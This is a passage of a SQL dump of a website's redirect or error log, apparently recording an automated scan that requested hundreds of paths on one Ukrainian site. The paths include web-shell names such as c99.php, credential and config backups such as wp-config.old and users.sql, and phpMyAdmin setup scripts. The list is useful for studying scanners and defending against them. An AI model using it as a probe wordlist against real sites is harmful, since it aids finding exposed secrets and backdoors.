00:00:00',301),(8589,'http://ekvatorprint.com.ua/tiki-admin.php',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8590,'http://ekvatorprint.com.ua/thumbnail',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8591,'http://ekvatorprint.com.ua/tiki-admin',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8592,'http://ekvatorprint.com.ua/tiki-admin.',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8593,'http://ekvatorprint.com.ua/tiki/doc/stable.version',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8594,'http://ekvatorprint.com.ua/tiny_mce',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8595,'http://ekvatorprint.com.ua/tiny_mce/plugins/filemanager/examples.html',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8596,'http://ekvatorprint.com.ua/tiny_mce/',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8597,'http://ekvatorprint.com.ua/tiny_mce/plugins/imagemanager/pages/im/index.html',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8598,'http://ekvatorprint.com.ua/tinymce/',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8599,'http://ekvatorprint.com.ua/tinymce/jscripts/tiny_mce',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8600,'http://ekvatorprint.com.ua/tinymce',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8601,'http://ekvatorprint.com.ua/tips',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8602,'http://ekvatorprint.com.ua/title',NULL,'','',1,0,'2017-01-20 13:29:29','0000-00-00 00:00:00',301),(8603,'http://ekvatorprint.com.ua/tmp/Cgishell.pl',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8604,'http://ekvatorprint.com.ua/tmp/L3b.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8605,'http://ekvatorprint.com.ua/tmp/access_log',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8606,'http://ekvatorprint.com.ua/tmp/Sym.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8607,'http://ekvatorprint.com.ua/tmp/access.log',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8608,'http://ekvatorprint.com.ua/tmp/admin.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8609,'http://ekvatorprint.com.ua/tmp/cgi.pl',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8610,'http://ekvatorprint.com.ua/tmp/changeall.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8611,'http://ekvatorprint.com.ua/tmp/cpn.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8612,'http://ekvatorprint.com.ua/tmp/d.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8613,'http://ekvatorprint.com.ua/tmp/domaine.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8614,'http://ekvatorprint.com.ua/tmp/d0maine.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8615,'http://ekvatorprint.com.ua/tmp/domaine.pl',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8616,'http://ekvatorprint.com.ua/tmp/error.log',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8617,'http://ekvatorprint.com.ua/tmp/dz.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8618,'http://ekvatorprint.com.ua/tmp/dz1.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8619,'http://ekvatorprint.com.ua/tmp/error_log',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8620,'http://ekvatorprint.com.ua/tmp/killer.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8621,'http://ekvatorprint.com.ua/tmp/madspotshell.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8622,'http://ekvatorprint.com.ua/tmp/sql.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8623,'http://ekvatorprint.com.ua/tmp/priv8.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8624,'http://ekvatorprint.com.ua/tmp/root.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8625,'http://ekvatorprint.com.ua/tmp/up.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8626,'http://ekvatorprint.com.ua/tmp/upload.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8627,'http://ekvatorprint.com.ua/tmp/user.php',NULL,'','',3,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8628,'http://ekvatorprint.com.ua/tmp/uploads.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8629,'http://ekvatorprint.com.ua/tmp/vaga.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8630,'http://ekvatorprint.com.ua/tmp/whmcs.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8631,'http://ekvatorprint.com.ua/tmp/xd.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8632,'http://ekvatorprint.com.ua/tn',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8633,'http://ekvatorprint.com.ua/tools',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8634,'http://ekvatorprint.com.ua/tools/_backups/',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8635,'http://ekvatorprint.com.ua/topicadmin.php',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8636,'http://ekvatorprint.com.ua/topic',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8637,'http://ekvatorprint.com.ua/topicadmin',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8638,'http://ekvatorprint.com.ua/top',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8639,'http://ekvatorprint.com.ua/topicadmin.',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8640,'http://ekvatorprint.com.ua/touradmin',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8641,'http://ekvatorprint.com.ua/topics',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8642,'http://ekvatorprint.com.ua/trackback',NULL,'','',1,0,'2017-01-20 13:29:30','0000-00-00 00:00:00',301),(8643,'http://ekvatorprint.com.ua/tradetheme',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8644,'http://ekvatorprint.com.ua/training',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8645,'http://ekvatorprint.com.ua/trans',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8646,'http://ekvatorprint.com.ua/transfer',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8647,'http://ekvatorprint.com.ua/travel',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8648,'http://ekvatorprint.com.ua/tsweb',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8649,'http://ekvatorprint.com.ua/tst',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8650,'http://ekvatorprint.com.ua/tsweb/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8651,'http://ekvatorprint.com.ua/ttadmin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8652,'http://ekvatorprint.com.ua/ttt_admin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8653,'http://ekvatorprint.com.ua/tttadmin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8654,'http://ekvatorprint.com.ua/tubeace-admin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8655,'http://ekvatorprint.com.ua/tv',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8656,'http://ekvatorprint.com.ua/tutorials',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8657,'http://ekvatorprint.com.ua/tvadmin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8658,'http://ekvatorprint.com.ua/txt/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8659,'http://ekvatorprint.com.ua/types',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8660,'http://ekvatorprint.com.ua/typo3',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8661,'http://ekvatorprint.com.ua/typo3/phpmyadmin/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8662,'http://ekvatorprint.com.ua/typo3/phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8663,'http://ekvatorprint.com.ua/uadmin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8664,'http://ekvatorprint.com.ua/uber/phpMemcachedAdmin/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8665,'http://ekvatorprint.com.ua/uber/phpMyAdmin/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8666,'http://ekvatorprint.com.ua/uber/phpMyAdminBackup/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8667,'http://ekvatorprint.com.ua/uddi/uddilistener',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8668,'http://ekvatorprint.com.ua/uddiexplorer',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8669,'http://ekvatorprint.com.ua/uddi',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8670,'http://ekvatorprint.com.ua/uddilistener',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8671,'http://ekvatorprint.com.ua/uddigui/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8672,'http://ekvatorprint.com.ua/uddisoap/',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8673,'http://ekvatorprint.com.ua/ujadmin',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8674,'http://ekvatorprint.com.ua/unattend.txt',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8675,'http://ekvatorprint.com.ua/uk',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8676,'http://ekvatorprint.com.ua/umbraco/webservices/codeEditorSave.asmx',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8677,'http://ekvatorprint.com.ua/updates',NULL,'','',1,0,'2017-01-20 13:29:31','0000-00-00 00:00:00',301),(8678,'http://ekvatorprint.com.ua/upload',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8679,'http://ekvatorprint.com.ua/upgrade',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8680,'http://ekvatorprint.com.ua/upl.php',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8681,'http://ekvatorprint.com.ua/upload.cfm',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8682,'http://ekvatorprint.com.ua/upload.aspx',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8683,'http://ekvatorprint.com.ua/upload.html',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8684,'http://ekvatorprint.com.ua/upload.asp',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8685,'http://ekvatorprint.com.ua/upload.htm',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8686,'http://ekvatorprint.com.ua/upload/b_user.csv',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8687,'http://ekvatorprint.com.ua/upload.shtm',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8688,'http://ekvatorprint.com.ua/upload/test.txt',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8689,'http://ekvatorprint.com.ua/upload/upload.php',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8690,'http://ekvatorprint.com.ua/upload/',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8691,'http://ekvatorprint.com.ua/upload.php3',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8692,'http://ekvatorprint.com.ua/upload/b_user.xls',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8693,'http://ekvatorprint.com.ua/upload_admin',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8694,'http://ekvatorprint.com.ua/uploader',NULL,'','',1,0,'2017-01-20 13:29:32','0000-00-00 00:00:00',301),(8695,'http://ekvatorprint.com.ua/upload2.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8696,'http://ekvatorprint.com.ua/upload/test.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8697,'http://ekvatorprint.com.ua/upload_file.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8698,'http://ekvatorprint.com.ua/uploader.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8699,'http://ekvatorprint.com.ua/uploader/',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8700,'http://ekvatorprint.com.ua/uploadify',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8701,'http://ekvatorprint.com.ua/uploadfiles.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8702,'http://ekvatorprint.com.ua/uploadify.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8703,'http://ekvatorprint.com.ua/uploadfile.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8704,'http://ekvatorprint.com.ua/uploads.php',NULL,'','',3,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8705,'http://ekvatorprint.com.ua/uploads',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8706,'http://ekvatorprint.com.ua/uploads_admin',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8707,'http://ekvatorprint.com.ua/uploadify/',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8708,'http://ekvatorprint.com.ua/us',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8709,'http://ekvatorprint.com.ua/ur-admin.php',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8710,'http://ekvatorprint.com.ua/url',NULL,'','',1,0,'2017-01-20 13:29:33','0000-00-00 00:00:00',301),(8711,'http://ekvatorprint.com.ua/upstream_conf',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8712,'http://ekvatorprint.com.ua/usage/',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8713,'http://ekvatorprint.com.ua/uri',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8714,'http://ekvatorprint.com.ua/usagedata/',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8715,'http://ekvatorprint.com.ua/usebean.jsp',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8716,'http://ekvatorprint.com.ua/user/login/',NULL,'','',1,0,'2017-01-20 13:29:34','0000-00-00 00:00:00',301),(8717,'http://ekvatorprint.com.ua/user.',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8718,'http://ekvatorprint.com.ua/user/login.php',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8719,'http://ekvatorprint.com.ua/user.html',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8720,'http://ekvatorprint.com.ua/user/login.',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8721,'http://ekvatorprint.com.ua/useradmin',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8722,'http://ekvatorprint.com.ua/user_guide',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8723,'http://ekvatorprint.com.ua/user_uploads',NULL,'','',1,0,'2017-01-20 13:29:35','0000-00-00 00:00:00',301),(8724,'http://ekvatorprint.com.ua/useradmin/',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8725,'http://ekvatorprint.com.ua/user.txt',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8726,'http://ekvatorprint.com.ua/user_admin',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8727,'http://ekvatorprint.com.ua/usercp',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8728,'http://ekvatorprint.com.ua/userfiles',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8729,'http://ekvatorprint.com.ua/userinfo.php',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8730,'http://ekvatorprint.com.ua/usernames.txt',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8731,'http://ekvatorprint.com.ua/users',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8732,'http://ekvatorprint.com.ua/users.db',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8733,'http://ekvatorprint.com.ua/users.csv',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8734,'http://ekvatorprint.com.ua/userinfo.',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8735,'http://ekvatorprint.com.ua/users.php',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8736,'http://ekvatorprint.com.ua/users.log',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8737,'http://ekvatorprint.com.ua/users.ini',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8738,'http://ekvatorprint.com.ua/users.mdb',NULL,'','',1,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8739,'http://ekvatorprint.com.ua/users.sql',NULL,'','',3,0,'2017-01-20 13:29:36','0000-00-00 00:00:00',301),(8740,'http://ekvatorprint.com.ua/users.sql.gz',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8741,'http://ekvatorprint.com.ua/users/login',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8742,'http://ekvatorprint.com.ua/users.sqlite',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8743,'http://ekvatorprint.com.ua/users/',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8744,'http://ekvatorprint.com.ua/users/login.php',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8745,'http://ekvatorprint.com.ua/users.txt',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8746,'http://ekvatorprint.com.ua/usr-bin/',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8747,'http://ekvatorprint.com.ua/utf8',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8748,'http://ekvatorprint.com.ua/users.xls',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8749,'http://ekvatorprint.com.ua/users/login.',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8750,'http://ekvatorprint.com.ua/utilitiesadmin.php',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8751,'http://ekvatorprint.com.ua/utilitiesadmin.',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8752,'http://ekvatorprint.com.ua/utils',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8753,'http://ekvatorprint.com.ua/vadmin.',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8754,'http://ekvatorprint.com.ua/vagrant-spec.config.rb',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8755,'http://ekvatorprint.com.ua/v',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8756,'http://ekvatorprint.com.ua/vadmin',NULL,'','',1,0,'2017-01-20 13:29:37','0000-00-00 00:00:00',301),(8757,'http://ekvatorprint.com.ua/validator.php',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8758,'http://ekvatorprint.com.ua/var',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8759,'http://ekvatorprint.com.ua/vadmin.php',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8760,'http://ekvatorprint.com.ua/v1',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8761,'http://ekvatorprint.com.ua/var/backups/',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8762,'http://ekvatorprint.com.ua/var/log/',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8763,'http://ekvatorprint.com.ua/var/logs/',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8764,'http://ekvatorprint.com.ua/vb.rar',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8765,'http://ekvatorprint.com.ua/variables.',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8766,'http://ekvatorprint.com.ua/vb.sql',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8767,'http://ekvatorprint.com.ua/vb.zip',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8768,'http://ekvatorprint.com.ua/variables.php',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8769,'http://ekvatorprint.com.ua/view-source',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8770,'http://ekvatorprint.com.ua/web-console/',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8771,'http://ekvatorprint.com.ua/vtund.conf',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8772,'http://ekvatorprint.com.ua/wcx_ftp.ini',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8773,'http://ekvatorprint.com.ua/web-console/Invoker',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8774,'http://ekvatorprint.com.ua/web-console/ServerInfo.jsp',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8775,'http://ekvatorprint.com.ua/web.Debug.config',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8776,'http://ekvatorprint.com.ua/web.Release.confiРї',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8777,'http://ekvatorprint.com.ua/web.config.bak',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8778,'http://ekvatorprint.com.ua/web.config.old',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8779,'http://ekvatorprint.com.ua/web.config.bakup',NULL,'','',1,0,'2017-01-20 13:29:38','0000-00-00 00:00:00',301),(8780,'http://ekvatorprint.com.ua/web.config.temp',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8781,'http://ekvatorprint.com.ua/web.config.tmp',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8782,'http://ekvatorprint.com.ua/web/phpMyAdmin/scripts/setup.php',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8783,'http://ekvatorprint.com.ua/web.config::$DATA',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8784,'http://ekvatorprint.com.ua/web/phpMyAdmin/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8785,'http://ekvatorprint.com.ua/web/scripts/setup.php',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8786,'http://ekvatorprint.com.ua/webadmin',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8787,'http://ekvatorprint.com.ua/webadmin/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8788,'http://ekvatorprint.com.ua/webadmin.html',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8789,'http://ekvatorprint.com.ua/webadmin.php',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8790,'http://ekvatorprint.com.ua/webdav/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8791,'http://ekvatorprint.com.ua/webdav/index.html',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8792,'http://ekvatorprint.com.ua/webdb/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8793,'http://ekvatorprint.com.ua/webdav/servlet/webdav/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8794,'http://ekvatorprint.com.ua/webgrind',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8795,'http://ekvatorprint.com.ua/webmail/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8796,'http://ekvatorprint.com.ua/website.git',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8797,'http://ekvatorprint.com.ua/webmin/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8798,'http://ekvatorprint.com.ua/webstat/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8799,'http://ekvatorprint.com.ua/webstats/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8800,'http://ekvatorprint.com.ua/websql/',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8801,'http://ekvatorprint.com.ua/webstats.html',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8802,'http://ekvatorprint.com.ua/whmcs.php',NULL,'','',1,0,'2017-01-20 13:29:39','0000-00-00 00:00:00',301),(8803,'http://ekvatorprint.com.ua/whmcs/downloads/dz.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8804,'http://ekvatorprint.com.ua/wp-admin/c99.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8805,'http://ekvatorprint.com.ua/wp-admin/',NULL,'','',3,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8806,'http://ekvatorprint.com.ua/wp-app.log',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8807,'http://ekvatorprint.com.ua/wp-config.',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8808,'http://ekvatorprint.com.ua/wp-config.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8809,'http://ekvatorprint.com.ua/wp-config.inc',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8810,'http://ekvatorprint.com.ua/wp-config.old',NULL,'','',3,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8811,'http://ekvatorprint.com.ua/wp-config.php.dist',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8812,'http://ekvatorprint.com.ua/wp-config.php.inc',NULL,'','',1,0,'2017-01-20 